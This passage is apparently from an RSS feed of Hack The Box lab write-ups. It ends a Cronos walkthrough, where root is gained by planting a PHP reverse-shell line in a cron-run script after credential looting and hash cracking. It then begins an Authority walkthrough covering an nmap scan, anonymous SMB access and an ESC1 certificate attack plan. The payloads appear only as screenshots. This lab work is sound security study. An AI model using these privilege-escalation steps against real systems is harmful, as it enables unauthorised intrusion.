/static/b2483dfb99d5c1676078066fe0726810/eb8fc/reverse-shell-payload.png 530w" sizes="(max-width: 530px) 100vw, 530px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Obtained a shell as <code class="language-text">www-data</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/d9bc899f609684289642d3ac06143fcc/a8e7c/shell-www-data.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 27.21518987341772%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABDUlEQVR42k2QzXqCMBBFeZNqFUUQUUhChEhU8AdtKWza93+S2xtctIvzTWYxZ+bGC7IageqwzHus9ROpblDYT6iyhTI3qOKCIN7jbbbF1E9JhokvMJmzDzK8B4LIFysFT5knqnrg8B2H8xdKyuT+ikRYbHYVcicuH9iqBrv8Sm7Y8Z2KCj6Fi1BgsXrV+UrCs00Pc+pQUWbrfuTYDKwDmvaHS4ZRthE14uyMraRMWorPiFKLNYm4OE4PWEYUugsyfYHQ3C5rJNkJqXL9baxhUmGxLkmBZWzgh5qxXVyFWZiPMf/I4WnTMuYHDrxSmwf/7A5z7GBsh/r6zcsHXnFCIl3ky7jQRXTDM8qd9D+/M7GjoNC1YMYAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="shell as www-data" title="" src="/static/d9bc899f609684289642d3ac06143fcc/50637/shell-www-data.png" srcset="/static/d9bc899f609684289642d3ac06143fcc/dda05/shell-www-data.png 158w, /static/d9bc899f609684289642d3ac06143fcc/679a3/shell-www-data.png 315w, /static/d9bc899f609684289642d3ac06143fcc/50637/shell-www-data.png 630w, /static/d9bc899f609684289642d3ac06143fcc/a8e7c/shell-www-data.png 648w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">config.php</code> within <code class="language-text">/var/www/admin</code> contained MySQL credentials:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 586px; " > <a class="gatsby-resp-image-link" href="/static/e6f78caf31ff392a5c742a0c2be711f3/9cf6f/config-php.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 31.645569620253163%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABPUlEQVR42k1QW3KCQBDkKhEQhZTyWtgFRF6LgBhNtGJVfnL/U3Rm15jKR1ezU0NPdxtF9QY5fEKOd5TNBfv2HY28oupuGOYvVPKGpBjBsgGinMHyEZu4QcQlQt7B3eZYOBEWyxAv1hYG3x1J5KIXAtbBp+Ugbok7EhnhM4lNWGMTNSTQw086WF4GW0PAcjnMNUFzAmPpCuzqM7L9CQWh7q44THd42xK8OKKoznRIwnYzWGsBc/UQWKxScpZoNte/cFMYNgmqmCpuIz909Mv1mxz3yCiieudUCxODPhAkEs5rocXVv8rhkxUMx8vB84kithC7SXeVl0eEqSSBib5PSKm3gKIKqkcJh0lPs0nP1V6cHXTPrl/CiMlJRFdjfkCUPvryWQum5mlPIjOJzjApnkNOlv+gnKkebY//9fkDnmLHhIYJO0oAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="config.php" title="" src="/static/e6f78caf31ff392a5c742a0c2be711f3/9cf6f/config-php.png" srcset="/static/e6f78caf31ff392a5c742a0c2be711f3/dda05/config-php.png 158w, /static/e6f78caf31ff392a5c742a0c2be711f3/679a3/config-php.png 315w, /static/e6f78caf31ff392a5c742a0c2be711f3/9cf6f/config-php.png 586w" sizes="(max-width: 586px) 100vw, 586px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I logged in to view the <code class="language-text">admin</code> database and found a username and password in the <code class="language-text">users</code> table:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/28bba4c2175f97f583743e277f2b1ba7/a8e7c/mysql-view-db.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 89.87341772151898%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC1UlEQVR42m1U23aiQBDkTxI1CigCg8P9oniP0WzO2f//ltrqxuyaPT7U6WGYqa6ubnCa3S90hy/0p99odp+Iix1sfUJan5GUR6TNGUvbc31QeFGDaVDibVFgMs9/YpHDqfubkklshXz/hax9R8XnMNsqqSn2iNItwrSHHzdYJGvMlhXGfqZEEr/XTpztsGLmFS8ZEoR2jchukFaytyPRRokinjP5Hm5YqzqBS1IhdqNa95UwXG148KBZl1wnvCR74WqNMGkRmgYR4yIqlTypjppAIBaEVB5lg3olLLsPVOsPVZfXRxTNSWPJsjOqlHXVnWBsy/WBdlyQE2oJvZ34OV5ci1dCCUWRwFvWmAWUz+hRvr8sMZtnGl2aPSO8IB/exS3mptW1e4fsSbOcMNkgMOJbz8hDcpkGL6IWfthgHneYLipe5jP98haWCVLMw4Io9Y5YZYqDEjvt9hMCKbHZ3JA3FzbjTAvoj+UIVRyf4oiYCWOWbfIdYul+Tu9sBz/I8DIJ8epZjKVkw0srXo4tDzEayxGx0tEjM/ck3jNuEa86JhiUxELKqZgnHW0qMZ7GmMwMPSzgVN0VVXulwg90/RdMesDrNMVolmHkZjR7iC+TJaPFyJPnVDH2sr9DPXYTTKjSMemOnb2wo2d2+4q0POPN41fgP4IqRAEvvS1KVTJ59qVoyXfCgOYHMWfRbJiJL/8n5d5oGpE4ViUTX5AS2U/CiD6tONjf0bIBYdKzhOek46lRtQp6N5YkAnel5E5C00WlkAlRLJ0tTox7zl49IHgAn8WCIUk+gGRKTku0ZFElTZEGybpe39RLfymz1w0zeMc86pR07N3JtFRRnw6Egel0NIREypYEA/mQoJQJ6G53XJHVlwfCB5V+rmU7Ecv8LltKTcsTLGfQX/IrkS+FKufhP4jqqZTs5T/IFBwjbUrG8vLqnV20PMxfkxzm7D1HPrz3n+MP/74+56qHLccAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="mysql view database" title="" src="/static/28bba4c2175f97f583743e277f2b1ba7/50637/mysql-view-db.png" srcset="/static/28bba4c2175f97f583743e277f2b1ba7/dda05/mysql-view-db.png 158w, /static/28bba4c2175f97f583743e277f2b1ba7/679a3/mysql-view-db.png 315w, /static/28bba4c2175f97f583743e277f2b1ba7/50637/mysql-view-db.png 630w, /static/28bba4c2175f97f583743e277f2b1ba7/a8e7c/mysql-view-db.png 648w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The password seemed to be a potential MD5 hash so I went to <a href="https://hashes.com/en/decrypt/hash" target="_blank">hashes.com</a> to crack it:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/3f8f394942f8c6280f299b4b9ad0f320/ab587/md5-cracked-hash.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 36.075949367088604%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABqklEQVR42nXOPUwTYRzH8WvLgdxxtUevB61towjRxMW46IBKopMSJ8OLgcqbmhgSR1+oTNgCAomzIaiIA3FgQWI0kcGJxcFiBF8otrjYwbeog/Dlf1djgolP8snze/7555dHKTXiVJ+4yM7OAeJt/dit/YRarouky24VLX1/XBNXi5odV7CbLlN1Jol5rB2Px4eiBuqoST2hYfYz9Q/X2HM/T+1knjq5nRy7myM8kSPyP+Or7JgqYCVnioVacB+nLvXRcfMWidQIPUNjdA86Rl2d6RE6xNnU8F+J1BCJG0XtA2m6hkdpvNArhSpKhX2AxwtP+c4nvv0u8JMvW/ziq2tDXkj61/r6D5wz9/wRiuIUhg8yPj3FcvYVLxYXePk+Q2Z1iUz2tWtRsuNNfoW3+axY2WL5wztyhY/cnr6D4v4wcoT9vfc4OjjP4fQzIoeaMMwofnsXRiiOYcVEFD0YEWH0ympRhWbaIoQWsNBNC80fxFtSjuKPHSd6eoza8w/YfW4SY+9J1PIoqh7Dt80WFr4yWS6rxFtqigBedbvw4ykxRAUeny40melsAv48QnI8BKgFAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="md5 cracked hash" title="" src="/static/3f8f394942f8c6280f299b4b9ad0f320/50637/md5-cracked-hash.png" srcset="/static/3f8f394942f8c6280f299b4b9ad0f320/dda05/md5-cracked-hash.png 158w, /static/3f8f394942f8c6280f299b4b9ad0f320/679a3/md5-cracked-hash.png 315w, /static/3f8f394942f8c6280f299b4b9ad0f320/50637/md5-cracked-hash.png 630w, /static/3f8f394942f8c6280f299b4b9ad0f320/ab587/md5-cracked-hash.png 783w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>A password was found, but the only place it worked was on the <code class="language-text">admin.cronos.htb</code> page which wasn't useful because I already had access to that page anyway. So, I continued to enumerate the system and while doing so, found the user flag in <code class="language-text">/home/noulis</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 389px; " > <a class="gatsby-resp-image-link" href="/static/424048530da62c622dd895e16bece936/2f79b/user-flag.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 24.68354430379747%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsSAAALEgHS3X78AAAA/0lEQVR42m2P226CUBBF/ZPeq6iIWKXgETjAoSiId+tD2/T/v2I5aprGxIeduWRmzeyGKQ+EyYLIbKhW3+hiRzrd4k1KdL4mMTXZdCMzNXFWE2ZLBn7OIMgZS0+lNY+Wx1P7/axGUuzRZk0QL1AyMFJTUYHjZQKdMY4rHFfRHWjunh3uX1wBXJYvoH/YGaiSFWG6kOWKvmfoDVPst5iOG0ueyDcfWF2fTl9hDzWup2k56uqrK2Ax/yJKT5a31NtfstknZrbHj+bk1YFy9cNEz0UlRmqdL+VwykNrdBuo8x3jqCQQgCd2m7ai7YTnaEn8U8v2sfoTmj3Fqx3chJ2AR7K8ppxq8X6tAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="user flag" title="" src="/static/424048530da62c622dd895e16bece936/2f79b/user-flag.png" srcset="/static/424048530da62c622dd895e16bece936/dda05/user-flag.png 158w, /static/424048530da62c622dd895e16bece936/679a3/user-flag.png 315w, /static/424048530da62c622dd895e16bece936/2f79b/user-flag.png 389w" sizes="(max-width: 389px) 100vw, 389px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After some further enumeration, I found a task within <code class="language-text">/etc/crontab</code> that ran a PHP script every minute as <code class="language-text">root</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/6aabb549b35ea526c903ac65958880f4/5a032/crontab.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 44.93670886075949%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABnklEQVR42m1S7W6jMBDkUa5trgkkGDDGBmy+E9Im7fWke/9nmRubSCdV92O09nqZmR0RNcMNbrqjn2/QzQI3/4Lpb7DTJ2R9wUti8GOv8HSo8LSvwvk51tixv0v0Pxw3RM34gfH6B935N+zwjm668fwV7v5NtStkc0HZXkP1YkfZU+g/pERUuTdYuvK1Hu6w4x3GXeGWLzS8K+uJVhR0Wz6IUzXiNW0epN8IlX3j4MrBFXHe4eCROZ5duO9FS1gSbHXP6t9/HusQx3fSKCt75GqA1GOoguqZnoOrhIRJ0SMuunA+lUO4+5V3JPRZPsdVwMsDkTRnpBzIqwmlJy0dpJlguvfgXHHFoj6HLIWaQo7KrqF3oGMvkFDwGEQdIt1/IDcXvAquKEeuzJq1YWVhFpQ+EuaYkSDmxyndC5qQFDj5bZitMDMFFohqRNQ3V3RsSqqVxFYblCTVdN6SoKF7zXWl2HpaDqhJpijq+4axFSTzUUQLAx74YPiPtQzZnmo4YswtZg5PHBq4zkgM2dbrOe/SeusVDpOokSb8TxONvxC6JWuy4c8sAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="crontab" title="" src="/static/6aabb549b35ea526c903ac65958880f4/50637/crontab.png" srcset="/static/6aabb549b35ea526c903ac65958880f4/dda05/crontab.png 158w, /static/6aabb549b35ea526c903ac65958880f4/679a3/crontab.png 315w, /static/6aabb549b35ea526c903ac65958880f4/50637/crontab.png 630w, /static/6aabb549b35ea526c903ac65958880f4/5a032/crontab.png 748w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">www-data</code> owned this file and had full permissions:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 589px; " > <a class="gatsby-resp-image-link" href="/static/fc3297e9a23c6afc9d5f8eec2206eab1/4220b/artisan-permissions.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 78.48101265822784%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAADBElEQVR42lVU2XLbMBDzpyRtmji2FduyblGUqMOSfJ85//87UCydSacPO5lQJBbAYj0oujPq9Su6/ReK9oRQr5A3R6hqz9rBdBfo5mDPp4HB3dDHr2epAA/jkBX8V4O42CBhyQNnUWDql7ZefIN5VGM0y/D0kmIRN3B4NnY1v5UYzzP8Hn0DTQL8mXwDhnqNMFvhxTOYhTVSsyWTEl7aIcrXGE5TPBNU2AtraZKWO/hpi0cnwcMoJLBvywKqYo2s3GJOEJeX69UrTHuGrg9Ybt/ZrMOQDM3yZM/n4Q0wpSrFv0+TmCoUG8c3QC+pEagGo2lEyRnK/oKCpeojmt0HAlpxP4qQkJ0m6IRyE36LqaRcv6Fi01zOXVpAbwea1HPVwncVgnmKIi5R6Q5adVgSJI0qTJ0YDVWUVBN6OXI2Mbrn2Q5xSL8XOdlFlE+Gl7jCWS2xWmj0rFfd4hxqnHj+YTZYexolp/lZbnCl/H6ucEyWOCUNzmmDNd8MyexOpk4/B1GxRcJOjkyW/tSbd0iUFAGWu08EMjA5p7ycHjr0Oin3SCi5PXzBrK7IGLOJm9soDRICygAWUWMnWPGCHQrlLgke56vvAb1ZryQBqjrYqLXbD35fE5yEKPteAGN6EbFmvDgNKsRsIFMM6GFGIJeNhpyiDEvOJY9yJ6afAiz5fZhEjE1oa7AIcnihwcgJMeHos3LFSKzsA2EqABJm2R5hNSETya4shHxPzcb+/4fxsYDK7K08YShVdyeU9QaaHnaUGWY9AXPKf4Ppr3DZQJF5Vu+5rp8WcDTX1j8LmNFgzbp52KDsrij4IM171P0ZXlxjzJVsbd74PyecSpwIJA1Sxkm26QfQjzuuUQfHLeBw/eJ8w8tcLQIpPnKZs0fKyfgDIZOVPY94J6J39h7fig0/Hipz4MMdH5Ihy7QXO1XFx1V7JKObhw1XUqa8IEOZquy5pq+zsML90P/HUOU7Cyg76iWtlWwoLeMEG0Yo4BYNp8rGqeC5a38c9naP2+2n3XXJsDQVwL9x/SZGrG7QugAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="artisan permissions" title="" src="/static/fc3297e9a23c6afc9d5f8eec2206eab1/4220b/artisan-permissions.png" srcset="/static/fc3297e9a23c6afc9d5f8eec2206eab1/dda05/artisan-permissions.png 158w, /static/fc3297e9a23c6afc9d5f8eec2206eab1/679a3/artisan-permissions.png 315w, /static/fc3297e9a23c6afc9d5f8eec2206eab1/4220b/artisan-permissions.png 589w" sizes="(max-width: 589px) 100vw, 589px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I added the following line to the <code class="language-text">artisan</code> script:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/401ae626110281fbf51023a4b720f8bf/66d45/artisan-php-shell-one-liner.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 60.12658227848101%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAACX0lEQVR42nVTS2/TQBjMj+AlQVslbew4ju2Nn0lsJ3GSJlXpiwJtaRHioR6gqCcQEm2lvlDbCEHhyIkj/3KY3UZRhMRh9O14P8+O9xvndvc+4uBkqHB09hXnw584vfyOs6sfODwd4vPxJT4dnuOA9fzqGmdybwKnF9/wZcjek0uYbopcudrkool8KUDBCHG/IHDrgYHbU2XcmTZxl7g3I0E+ZfwXcn+2HCAnxYpmjSTCHKtEsVKHZtWh2w1oI5QknDrRGKGuoNs30Cz5bohctdZD1FyEFw/gNwZw6/MIye0gQ0kkMKrpBBKUJ8F902WPiJWYErT8TIk4QQci6sEmt7l2oi4qbgsVrwU77MDiARIO13bQhuW3IELZ21IOx4Ii7KLdX0ezt6pq2l1F3FkhXyN/hDhbRjpap+xpzd/Udn8NUdqnu4a6u7FgmY6q0qF0R1fShc1DpCvB65BOTa+tqqj3UGG/6qW7PAUKhj8WU4JhJYSjuxAlD4IniXKo4BgBEY54hKoZjXiknrnk7oTQWHCel9rymuh4CTI3RpNZ6tBNRocp1zVOu+HE8HmAq3uIOZyYA0mYjjYnXzT+EdQYEdNJFIolH5ouYHF6GuOTZEtY33iFpbUdDB5uIuksY6rgIF/0UNB9TM9VkWctMMNzdC2R2365B49xkdPefPEWNUbGorMnO7t4/mYf+x+O8Ov3HxxfXOMZe3dev0fCIRkiJX+HhEO0/TZ0fokS7C1uqChoVgPZwmMlbjIug+UtPu/yz3EQJAsq7DOah8HKNnv6zGGK3uJTRq6v/jSZxVkjwF/uUpmJSUbojQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="artisan php shell one-liner" title="" src="/static/401ae626110281fbf51023a4b720f8bf/50637/artisan-php-shell-one-liner.png" srcset="/static/401ae626110281fbf51023a4b720f8bf/dda05/artisan-php-shell-one-liner.png 158w, /static/401ae626110281fbf51023a4b720f8bf/679a3/artisan-php-shell-one-liner.png 315w, /static/401ae626110281fbf51023a4b720f8bf/50637/artisan-php-shell-one-liner.png 630w, /static/401ae626110281fbf51023a4b720f8bf/66d45/artisan-php-shell-one-liner.png 683w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Once the task ran, <code class="language-text">nc</code> caught a shell as <code class="language-text">root</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/06e00bc957d0d6ef53ce3be5349cb64e/abbf1/root.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 31.0126582278481%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABFElEQVR42n2R6XKCMACEeZXKKVDkSMIRFKNVFGzp+7/MdoFOpx1n+uObXJPN7sby0w5eMcKVE4KiRyZP0N0DVTuiOTxQtwO2icaLK7DxJDa+XEfiBBVsv+QemefbCpbQA7T5hNB3tGaiyAile+QU3uVHlPqGQl3wmnVIckOO2BWG6yNcCnhhA5d4UQMnrGF15gMHsjfvOJwmdKSlw2Y/Lus9z2TVLxTlBaq50f0AUV0RM12SGcQkKc7wYw2rbu+Q9RW5Ov+4CqIaIQ+jpEUQ82VfMdozTlAu2HPcb6ySUefOVNNDUVjQRcI4KWOl4rQ8FFL4t8Az1drnLCjKN+S8GNGJx04WNyzcXopfP8L25T9if0W/AMNMwFq1O4IKAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="root" title="" src="/static/06e00bc957d0d6ef53ce3be5349cb64e/50637/root.png" srcset="/static/06e00bc957d0d6ef53ce3be5349cb64e/dda05/root.png 158w, /static/06e00bc957d0d6ef53ce3be5349cb64e/679a3/root.png 315w, /static/06e00bc957d0d6ef53ce3be5349cb64e/50637/root.png 630w, /static/06e00bc957d0d6ef53ce3be5349cb64e/abbf1/root.png 656w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p>https://mgarrity.com/hack-the-box-authority/https://mgarrity.com/hack-the-box-authority/Thu, 20 Jul 2023 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/306e4a95e5f09d7a0183267b251db5e9/3b67f/authority.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABBklEQVR42mMQkdX+jwuLymn/F5TR+c8toQOkIXx86kGYAZ9hPBLa/2Xl1f8baCqDaV5JwoYy4DKMT0r7v5Wh5v/KIr//i+eV/K/M9fhvYaD5n4+AoVgNBHlTUVHzf2a83f+Yxcv+vzu28X9o98T/2XF2/+UUNP8LAeWJNhDmVVND7f95SQ7/+5pK/7/dv+B/UUvP/6Rwm//mhlp4vY7VhULACJBV0v5fFm74f/+stv9fv//8P7O/9X+WFzAslfXA8iR5WQxoO8gVxvoa/yeV+f+/uKnrf2+h938jPQ1g2OqQHoYwr4MMFZNR+6+hIv9fRFqNoGF4DYS5VFQOmAZl9cC0GBHpEAC1kA2qMXj6SwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Authority" title="" src="/static/306e4a95e5f09d7a0183267b251db5e9/50637/authority.png" srcset="/static/306e4a95e5f09d7a0183267b251db5e9/dda05/authority.png 158w, /static/306e4a95e5f09d7a0183267b251db5e9/679a3/authority.png 315w, /static/306e4a95e5f09d7a0183267b251db5e9/50637/authority.png 630w, /static/306e4a95e5f09d7a0183267b251db5e9/fddb0/authority.png 945w, /static/306e4a95e5f09d7a0183267b251db5e9/3b67f/authority.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Authority is a Windows machine running Active Directory that has an open SMB share containing ansible vault encrypted credentials. Once decrypted, one of the credentials can be used to login to the configuration manager for PWM (a password self-service for LDAP directories). This grants access to a configuration XML file that can be modified to reveal the plaintext password for a service account on the system. The obtained credentials can be used to make a WinRM connection to the machine. During enumeration of the AD environment, a vulnerable certificate template (ESC1) is discovered that gives machines in the Domain Computers group the right to request a certificate as any user in the domain, this can be leveraged to authenticate to the LDAPS server and perform actions on the system as the <code class="language-text">administrator</code>, resulting in a system shell (<code class="language-text">nt authority/system</code>).</p> <p><code class="language-text">nmap</code> scan:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Authority] └─$ nmap -sC -sV 10.10.11.222 Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-20 12:43 EDT Nmap scan report for authority.htb (10.10.11.222) Host is up (0.041s latency). Not shown: 987 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-07-20 20:43:10Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name) &lt;...snip...> 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name) &lt;...snip...> 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name) 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name) 8443/tcp open ssl/https-alt &lt;...snip...> Service Info: Host: AUTHORITY; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s | smb2-time: | date: 2023-07-20T20:43:52 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 58.51 seconds</code></pre></div> <p>Most notable open ports:</p> <ul> <li>53 (DNS)</li> <li>80 (HTTP)</li> <li>88 (Kerberos)</li> <li>445 (SMB)</li> <li>389, 3268 (LDAP)</li> <li>636, 3269 (LDAPS)</li> <li>8443 (HTTPS)</li> </ul> <p>Active Directory:</p> <ul> <li>domain name: authority.htb</li> <li>hostname: AUTHORITY</li> </ul> <p>First, I visited the webpage on port 80 which was just a default page for a Microsoft IIS server and it didn't seem to have anything useful.</p> <p>I proceeded with the typical Windows machine enumeration and checked if the open SMB port accepted anonymous logon and it did. The Development share had read permission:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/155f52e50616dc512ba17b9adefc75cc/f7ecb/crackmapexec-anonymous-logon.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 31.0126582278481%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABV0lEQVR42iWQ21KjUBBF+REfjOGEcL+cS5AECBCsaNTEmpkqHf//N9b04FOf0129eu/t+fmEb674+gW3f6Ebr7TDjbp9o9ydWEc1frrHjxzrQLMODX5o2cQ7VPLIJm0Isv1S/bjGS5o/JOUR1zwL6Ep9EHBzxsp/vnxS7WYekgPb+iL9J7QcyfSAkgNB7FACivWRpOoXsLepv+Syw8hiP31QuROFGaXOPL99k1YjKnS0bU9mJpkNdM2BPNMEYYVNU9S25D6wrLYWb+0+ufftAurG2wLLqiOlnTi/fhEVA5HYnF2JCowsG+LYECWOJHWcH3OOMovT/0CHp3Z/WSmLqZ8YTr8WcK5FoZ25vH9LHCNRZPjdaQZr2WtDZw136seyKTRFrlHyfhAnnl/dWG2MQIYlv1TyTIp+UdlPN8KsZSuqXpuKPBEVEk8YW7H4U0+1prea1ulF5T85H8QCCcS7AAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="crackmapexec anonymous logon" title="" src="/static/155f52e50616dc512ba17b9adefc75cc/50637/crackmapexec-anonymous-logon.png" srcset="/static/155f52e50616dc512ba17b9adefc75cc/dda05/crackmapexec-anonymous-logon.png 158w, /static/155f52e50616dc512ba17b9adefc75cc/679a3/crackmapexec-anonymous-logon.png 315w, /static/155f52e50616dc512ba17b9adefc75cc/50637/crackmapexec-anonymous-logon.png 630w, /static/155f52e50616dc512ba17b9adefc75cc/f7ecb/crackmapexec-anonymous-logon.png 856w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">spider_plus</code> from <code 